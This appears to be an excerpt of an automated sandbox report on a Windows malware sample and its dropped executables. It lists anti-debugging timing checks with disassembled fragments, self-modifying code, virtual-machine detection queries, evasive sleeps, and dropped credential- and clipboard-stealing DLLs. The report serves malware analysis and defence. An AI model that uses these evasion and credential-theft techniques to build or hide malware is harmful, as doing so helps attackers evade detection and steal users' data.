Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7970 second address: 8E7A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FC734882076h 0x0000000d jns 00007FC734882076h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jnc 00007FC734882080h 0x0000001f pop eax 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FC734882078h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000003h 0x0000003c mov dword ptr [ebp+122D2C80h], esi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FC734882078h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov ecx, dword ptr [ebp+122D3BE2h] 0x00000064 push 00000003h 0x00000066 jns 00007FC734882082h 0x0000006c call 00007FC734882079h 0x00000071 jmp 00007FC734882080h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC73488207Eh 0x00000080 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A2D second address: 8E7A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A31 second address: 8E7A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A37 second address: 8E7A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007FC734E5F77Eh 0x00000013 jnc 00007FC734E5F778h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A69 second address: 8E7A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FC734882076h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7A7E second address: 8E7B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F788h 0x00000008 jmp 00007FC734E5F781h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC734E5F778h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1244C644h] 0x00000031 jmp 00007FC734E5F789h 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d jmp 00007FC734E5F77Dh 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8E7BD8 second address: 8E7BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D7DAD second address: 8D7DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D7DB7 second address: 8D7DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 8D7DBB second address: 8D7DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FC734E5F776h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FC734E5F776h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 9065C5 second address: 9065D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 9065D0 second address: 9065D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 90689D second address: 9068A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 906F69 second address: 906F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 906F7F second address: 906F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 906F85 second address: 906F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 9070F1 second address: 9070FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 9070FC second address: 907101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe RDTSC instruction interceptor: First address: 90728D second address: 907298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: BEEE00 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: D8AB49 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: D8A8F3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: D95345 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Special instruction interceptor: First address: E16CC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 76EE00 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 90AB49 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 90A8F3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 915345 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 996CC0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 3CBE93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 5746A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 572E9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 3C94BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 59D955 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 57ED5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Special instruction interceptor: First address: 5FBBC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: DBE93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 2846A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 282E9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: D94BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 2AD955 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 28ED5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Special instruction interceptor: First address: 30BBC6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Special instruction interceptor: First address: DB4648 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Special instruction interceptor: First address: BF5AF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Special instruction interceptor: First address: E08FAD instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: BA4648 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 9E5AF5 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: BF8FAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 684648 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 4C5AF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: 6D8FAD instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Memory allocated: 2610000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Memory allocated: 2680000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Memory allocated: 4680000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Memory allocated: 1830000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Memory allocated: 32A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Memory allocated: 52A0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_051F0CAD rdtsc 0_2_051F0CAD
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1033 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 968 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1066 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1151 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1033 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1081 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 1070 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 895 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4066 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5741 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 9379
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 1149
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 821
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 1231
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 450
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Window / User API: threadDelayed 1415
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Window / User API: threadDelayed 8437
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Window / User API: threadDelayed 9310
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Window / User API: threadDelayed 9274
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1788 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2820 Thread sleep count: 1033 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 2820 Thread sleep time: -2067033s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7056 Thread sleep count: 968 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 7056 Thread sleep time: -1936968s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1292 Thread sleep count: 1066 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1292 Thread sleep time: -2133066s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 904 Thread sleep count: 254 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 904 Thread sleep time: -7620000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6472 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784 Thread sleep count: 1151 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784 Thread sleep time: -2303151s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 3292 Thread sleep count: 1033 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 3292 Thread sleep time: -2067033s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1880 Thread sleep count: 1081 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1880 Thread sleep time: -2163081s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1576 Thread sleep count: 1070 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1576 Thread sleep time: -2141070s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784 Thread sleep count: 895 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1784 Thread sleep time: -1790895s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6164 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3752 Thread sleep count: 9379 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3752 Thread sleep time: -9379000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5548 Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2888 Thread sleep count: 130 > 30
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2636 Thread sleep count: 129 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 1276 Thread sleep count: 1231 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 1276 Thread sleep count: 450 > 30
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe TID: 7992 Thread sleep count: 61 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 7812 Thread sleep count: 1415 > 30
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe TID: 7812 Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8088 Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8088 Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8096 Thread sleep count: 72 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8096 Thread sleep time: -144072s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8080 Thread sleep count: 61 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8080 Thread sleep time: -122061s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8056 Thread sleep count: 303 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8056 Thread sleep time: -9090000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 7868 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8076 Thread sleep count: 8437 > 30
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe TID: 8076 Thread sleep time: -16882437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe TID: 2676 Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe TID: 6624 Thread sleep time: -23980767295822402s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Thread sleep count: Count: 1149 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Thread sleep count: Count: 1231 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Thread sleep count: Count: 1415 delay: -10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696xa
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ccount.microsoft.com/profileVMware20,11696428655u
Source: 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696428655
Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696428
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169642865j
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r global passwords blocklistVMware20,11696428655
